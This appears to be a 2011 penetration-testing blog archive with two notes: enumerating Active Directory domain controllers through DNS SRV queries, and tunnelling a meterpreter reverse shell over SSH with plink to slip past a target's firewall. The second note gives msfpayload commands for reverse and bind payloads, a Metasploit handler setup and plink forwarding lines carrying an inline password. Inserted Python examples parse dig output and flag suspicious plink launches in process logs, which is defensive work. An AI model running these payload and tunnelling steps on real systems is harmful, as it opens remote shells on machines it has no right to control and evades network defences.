Quick notes – Enumerate Domain Controllers via nslookup

12/16/2011

Scenario:

Let’s say you know the domain name but you would like to enumerate all domain controllers.

domain: hacking.lab.local

# Linux Backtrack 5 R1 (attacker machine) 

  1. Open your Linux shell

Using Nslookup

nslookup
set type=srv
_ldap._tcp.dc._msdcs.hacking.lab.local

Using Dig (display a list of domain controllers; +short prints "priority weight port target" for each SRV record, so the fourth field is the DC host name)

dig +short SRV _ldap._tcp.dc._msdcs.hacking.lab.local | awk '{print $4}'
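The awk one-liner above only keeps the target host. When you want to keep the priority, weight and port too (a client picks the lowest-priority DCs first and spreads load by weight), parsing dig's answer section properly is clearer than counting fields. The following is an added example, not part of the original note: it parses both dig's full answer layout and the +short layout into records and orders the DCs the way a client would. The SAMPLE_DIG_OUTPUT text and the dc1/dc2/dc-backup host names are constructed for the example; function names are my own.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of what `dig SRV _ldap._tcp.dc._msdcs.hacking.lab.local`
# prints (BIND layout: name TTL IN SRV, then "priority weight port target").
# Host names and addresses are made up for this example.
SAMPLE_DIG_OUTPUT = """\
; <<>> DiG 9.16.1 <<>> SRV _ldap._tcp.dc._msdcs.hacking.lab.local
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1234
;; QUESTION SECTION:
;_ldap._tcp.dc._msdcs.hacking.lab.local.\tIN\tSRV

;; ANSWER SECTION:
_ldap._tcp.dc._msdcs.hacking.lab.local.\t600\tIN\tSRV\t0 100 389 dc1.hacking.lab.local.
_ldap._tcp.dc._msdcs.hacking.lab.local.\t600\tIN\tSRV\t0 100 389 dc2.hacking.lab.local.
_ldap._tcp.dc._msdcs.hacking.lab.local.\t600\tIN\tSRV\t10 50 389 dc-backup.hacking.lab.local.

;; ADDITIONAL SECTION:
dc1.hacking.lab.local.\t3600\tIN\tA\t10.0.0.10

;; Query time: 1 msec
"""


@dataclass(frozen=True)
class SrvRecord:
    name: str
    priority: int
    weight: int
    port: int
    target: str


# Full dig layout: "name TTL IN SRV prio weight port target" (tabs or spaces).
_FULL = re.compile(
    r"^(?P<name>\S+)\s+\d+\s+IN\s+SRV\s+"
    r"(?P<prio>\d+)\s+(?P<weight>\d+)\s+(?P<port>\d+)\s+(?P<target>\S+)\s*$"
)
# `dig +short` layout: "prio weight port target".
_SHORT = re.compile(
    r"^(?P<prio>\d+)\s+(?P<weight>\d+)\s+(?P<port>\d+)\s+(?P<target>\S+)\s*$"
)


def parse_srv_records(text: str, name: str = "") -> list[SrvRecord]:
    """Extract SRV records from dig output; `name` labels +short records,
    which carry no owner name of their own."""
    records: list[SrvRecord] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # banner, section headers and the question line
        m = _FULL.match(line)
        rec_name = name
        if m:
            rec_name = m.group("name")
        else:
            m = _SHORT.match(line)
            if not m:
                continue  # e.g. A/AAAA glue in the ADDITIONAL section
        records.append(
            SrvRecord(
                rec_name,
                int(m.group("prio")),
                int(m.group("weight")),
                int(m.group("port")),
                m.group("target").rstrip("."),  # drop dig's trailing dot
            )
        )
    return records


def domain_controllers(records: list[SrvRecord]) -> list[str]:
    """DC host names in client preference order: lowest priority first,
    then highest weight, with duplicates removed."""
    ordered = sorted(records, key=lambda r: (r.priority, -r.weight, r.target))
    seen: set[str] = set()
    hosts: list[str] = []
    for r in ordered:
        if r.target not in seen:
            seen.add(r.target)
            hosts.append(r.target)
    return hosts


if __name__ == "__main__":
    for rec in parse_srv_records(SAMPLE_DIG_OUTPUT):
        print(f"{rec.target}:{rec.port}  prio={rec.priority} weight={rec.weight}")
    print("preferred order:", domain_controllers(parse_srv_records(SAMPLE_DIG_OUTPUT)))
```

Feed it `dig` output captured to a file (or pipe it in) and you get the same host list as the awk pipeline, plus the priority and weight that tell you which DCs a client would actually talk to first.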

References:

Verify DNS registration for DC using nslookup: http://technet.microsoft.com/en-us/library/cc738991%28WS.10%29.aspx

Get Domain Admins Script (GDA.bat): https://github.com/nullbind/Other-Projects/tree/master/GDA

Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011

Scenario:

Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you upload your meterpreter payload and run it, the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux Backtrack 5 R1 (attacker machine) 

  1. Fire up your SSH server
  2. Generate your meterpreter payload :
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msf.exe
  3. Drop msf.exe on your target
  4. Drop plink.exe on your target (plink version from Quest PuTTY)
  5. Set up an msf handler
color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.1.1
set lport 4444
set exitonsession false
exploit -j
  • Note: Use 127.0.1.1 instead of 127.0.0.1 (otherwise you will have a lot of problems)

On a Mac you will first have to add an alias for that address on the loopback interface:

# ifconfig lo0 alias 127.0.1.1

# Windows (target machine)

  1. Connect to the SSH server and set up the port forwarding:
plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444
  2. Start msf.exe

You should get a meterpreter reverse shell.

References:

Resilient SSH Tunneled Meterpreter Session: http://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTY: http://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:

Reverse:

## attacker ##
# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msfrev.exe

## target ##

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444

Bind:

## attacker ##

msfpayload windows/meterpreter/bind_tcp RHOST=127.0.1.1 LPORT=4444 X > /path/msfbind.exe

## target ##

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -R 127.0.1.1:4444:127.0.1.1:4444
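The reverse and bind variants above differ only in the direction of the plink forward: -L opens the listener on the machine running plink and carries connections to the SSH server's side, -R opens it on the SSH server and carries connections back. From the defender's side, both show up as a plink.exe process launch whose command line carries the forward spec (and, in these notes, the password in -pw). The following is an added example, not part of the original notes, that parses plink command lines from process-creation logs into their forwards and lists what a reviewer would want to look at. The SAMPLE_COMMAND_LINES entries are constructed (the first two mirror the plink lines above, the last two are controls that should produce nothing); the function and class names are my own.

```python
from __future__ import annotations

import shlex
from dataclasses import dataclass

# Constructed process-creation log entries (not real captures), reduced to
# their command lines. Entries 0 and 1 mirror the -L and -R plink lines from
# the notes; entries 2 and 3 should not produce any finding.
SAMPLE_COMMAND_LINES = [
    r'"C:\Users\Public\plink.exe" user@ip_of_my_ssh_server -pw mypass -P 443 -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444',
    r'plink.exe user@ip_of_my_ssh_server -pw mypass -P 443 -auto_store_key_in_cache -R 127.0.1.1:4444:127.0.1.1:4444',
    r'plink.exe -batch admin@jumphost.corp.example uptime',
    r'"C:\Windows\System32\notepad.exe" C:\notes\tunnel.txt',
]


@dataclass(frozen=True)
class Forward:
    direction: str   # "L": listener on the host running plink; "R": listener on the SSH server
    bind_host: str   # "" when the spec omits the bind address (plink then binds loopback)
    bind_port: int
    dest_host: str
    dest_port: int


def _parse_spec(direction: str, spec: str) -> Forward:
    """Parse plink's [bind_addr:]port:host:hostport forward argument (IPv4 form)."""
    parts = spec.split(":")
    if len(parts) == 3:
        parts.insert(0, "")
    if len(parts) != 4:
        raise ValueError(f"unrecognised forward spec: {spec!r}")
    bind_host, bind_port, dest_host, dest_port = parts
    return Forward(direction, bind_host, int(bind_port), dest_host, int(dest_port))


def _argv(cmdline: str) -> list[str]:
    # posix=False keeps Windows backslashes intact; strip the quotes it leaves on tokens.
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def parse_plink_forwards(cmdline: str) -> list[Forward]:
    """Collect every -L/-R forward on the command line, in either the
    '-L spec' or the '-Lspec' spelling."""
    argv = _argv(cmdline)
    forwards: list[Forward] = []
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok in ("-L", "-R") and i + 1 < len(argv):
            forwards.append(_parse_spec(tok[1], argv[i + 1]))
            i += 2
        elif tok.startswith(("-L", "-R")) and len(tok) > 2:
            forwards.append(_parse_spec(tok[1], tok[2:]))
            i += 1
        else:
            i += 1
    return forwards


def assess(cmdline: str) -> list[str]:
    """Reasons a reviewer would want this process launch looked at; empty when
    the binary is not plink.exe or the invocation carries nothing of note."""
    argv = _argv(cmdline)
    if not argv:
        return []
    exe = argv[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe != "plink.exe":
        return []
    findings: list[str] = []
    if "-pw" in argv:
        findings.append("SSH password supplied on the command line (recoverable from process logs)")
    for f in parse_plink_forwards(cmdline):
        where = f.bind_host or "127.0.0.1"
        if f.direction == "L":
            findings.append(
                f"local forward: {where}:{f.bind_port} on this host is tunnelled to "
                f"{f.dest_host}:{f.dest_port} on the SSH server's side"
            )
        else:
            findings.append(
                f"remote forward: {where}:{f.bind_port} on the SSH server is tunnelled "
                f"back to {f.dest_host}:{f.dest_port} on this host"
            )
    return findings


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(line)
        for finding in assess(line) or ["  (nothing of note)"]:
            print("  -", finding)
```

The loopback-to-loopback forward in the notes is exactly why the command line matters: nothing unusual leaves the host except an SSH session, so the process launch and its arguments are the place to look, not the network flow.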

You are currently viewing the archives for December, 2011 at hdesser.